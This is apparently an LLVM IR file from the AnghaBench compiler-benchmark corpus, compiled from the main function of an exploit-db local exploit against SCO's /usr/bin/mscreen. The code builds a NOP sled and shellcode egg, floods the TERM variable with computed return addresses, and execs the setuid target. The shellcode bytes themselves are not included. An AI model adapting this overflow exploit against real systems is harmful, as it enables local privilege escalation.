; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/sco/local/extr_261.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/sco/local/extr_261.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@offset = common dso_local global i32 0, align 4
@nop = common dso_local global i32 0, align 4
@NOPDEF = common dso_local global i32 0, align 4
@esp = common dso_local global i32 0, align 4
@egg = common dso_local global i32* null, align 8
@x86_nop = common dso_local global i32 0, align 4
@EGG = common dso_local global i32 0, align 4
@shell = common dso_local global i8* null, align 8
@buffer = common dso_local global i32* null, align 8
@SIZE = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [10 x i8] c"HOSTNAME=\00", align 1
@.str.1 = private unnamed_addr constant [6 x i8] c"TERM=\00", align 1
@.str.2 = private unnamed_addr constant [17 x i8] c"offset = [0x%x]\0A\00", align 1
@.str.3 = private unnamed_addr constant [17 x i8] c"/usr/bin/mscreen\00", align 1
@.str.4 = private unnamed_addr constant [8 x i8] c"mscreen\00", align 1
@.str.5 = private unnamed_addr constant [14 x i8] c"exec failed!\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %7 = load i32, i32* %4, align 4
  %8 = icmp sgt i32 %7, 1
  br i1 %8, label %9, label %18

9:                                                ; preds = %2
  %10 = load i8**, i8*** %5, align 8
  %11 = getelementptr inbounds i8*, i8** %10, i64 1
  %12 = load i8*, i8** %11, align 8
  %13 = call i64 @strtol(i8* %12, i32* null, i32 0)
  %14 = load i32, i32* @offset, align 4
  %15 = sext i32 %14 to i64
  %16 = add nsw i64 %15, %13
  %17 = trunc i64 %16 to i32
  store i32 %17, i32* @offset, align 4
  br label %18

18:                                               ; preds = %9, %2
  %19 = load i32, i32* %4, align 4
  %20 = icmp sgt i32 %19, 2
  br i1 %20, label %21, label %28

21:                                               ; preds = %18
  %22 = load i8**, i8*** %5, align 8
  %23 = getelementptr inbounds i8*, i8** %22, i64 2
  %24 = load i8*, i8** %23, align 8
  %25 = call i32 @strtoul(i8* %24, i32* null, i32 0)
  %26 = load i32, i32* @nop, align 4
  %27 = add nsw i32 %26, %25
  store i32 %27, i32* @nop, align 4
  br label %30

28:                                               ; preds = %18
  %29 = load i32, i32* @NOPDEF, align 4
  store i32 %29, i32* @nop, align 4
  br label %30

30:                                               ; preds = %28, %21
  %31 = call i32 (...) @get_esp()
  store i32 %31, i32* @esp, align 4
  %32 = load i32*, i32** @egg, align 8
  %33 = load i32, i32* @x86_nop, align 4
  %34 = load i32, i32* @EGG, align 4
  %35 = call i32 @memset(i32* %32, i32 %33, i32 %34)
  %36 = load i32*, i32** @egg, align 8
  %37 = getelementptr inbounds i32, i32* %36, i64 300
  %38 = load i8*, i8** @shell, align 8
  %39 = load i8*, i8** @shell, align 8
  %40 = call i32 @strlen(i8* %39)
  %41 = call i32 @memcpy(i32* %37, i8* %38, i32 %40)
  %42 = load i32*, i32** @buffer, align 8
  %43 = load i32, i32* @x86_nop, align 4
  %44 = load i32, i32* @SIZE, align 4
  %45 = call i32 @memset(i32* %42, i32 %43, i32 %44)
  %46 = load i32*, i32** @buffer, align 8
  %47 = load i32, i32* @nop, align 4
  %48 = sext i32 %47 to i64
  %49 = getelementptr inbounds i32, i32* %46, i64 %48
  %50 = load i8*, i8** @shell, align 8
  %51 = load i8*, i8** @shell, align 8
  %52 = call i32 @strlen(i8* %51)
  %53 = call i32 @memcpy(i32* %49, i8* %50, i32 %52)
  store i32 1, i32* %6, align 4
  br label %54

54:                                               ; preds = %67, %30
  %55 = load i32, i32* %6, align 4
  %56 = load i32, i32* @SIZE, align 4
  %57 = sub nsw i32 %56, 4
  %58 = icmp slt i32 %55, %57
  br i1 %58, label %59, label %70

59:                                               ; preds = %54
  %60 = load i32, i32* @esp, align 4
  %61 = load i32, i32* @offset, align 4
  %62 = add nsw i32 %60, %61
  %63 = load i32*, i32** @buffer, align 8
  %64 = load i32, i32* %6, align 4
  %65 = sext i32 %64 to i64
  %66 = getelementptr inbounds i32, i32* %63, i64 %65
  store i32 %62, i32* %66, align 4
  br label %67

67:                                               ; preds = %59
  %68 = load i32, i32* %6, align 4
  %69 = add nsw i32 %68, 4
  store i32 %69, i32* %6, align 4
  br label %54

70:                                               ; preds = %54
  %71 = load i32*, i32** @egg, align 8
  %72 = call i32 @memcpy(i32* %71, i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str, i64 0, i64 0), i32 9)
  %73 = load i32*, i32** @buffer, align 8
  %74 = call i32 @memcpy(i32* %73, i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.1, i64 0, i64 0), i32 5)
  %75 = load i32*, i32** @egg, align 8
  %76 = call i32 @putenv(i32* %75)
  %77 = load i32*, i32** @buffer, align 8
  %78 = call i32 @putenv(i32* %77)
  %79 = load i32, i32* @esp, align 4
  %80 = load i32, i32* @offset, align 4
  %81 = add nsw i32 %79, %80
  %82 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str.2, i64 0, i64 0), i32 %81)
  %83 = call i32 @execl(i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str.3, i64 0, i64 0), i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.4, i64 0, i64 0), i32* null)
  %84 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([14 x i8], [14 x i8]* @.str.5, i64 0, i64 0))
  ret i32 0
}

declare dso_local i64 @strtol(i8*, i32*, i32) #1

declare dso_local i32 @strtoul(i8*, i32*, i32) #1

declare dso_local i32 @get_esp(...) #1

declare dso_local i32 @memset(i32*, i32, i32) #1

declare dso_local i32 @memcpy(i32*, i8*, i32) #1

declare dso_local i32 @strlen(i8*) #1

declare dso_local i32 @putenv(i32*) #1

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32 @execl(i8*, i8*, i32*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
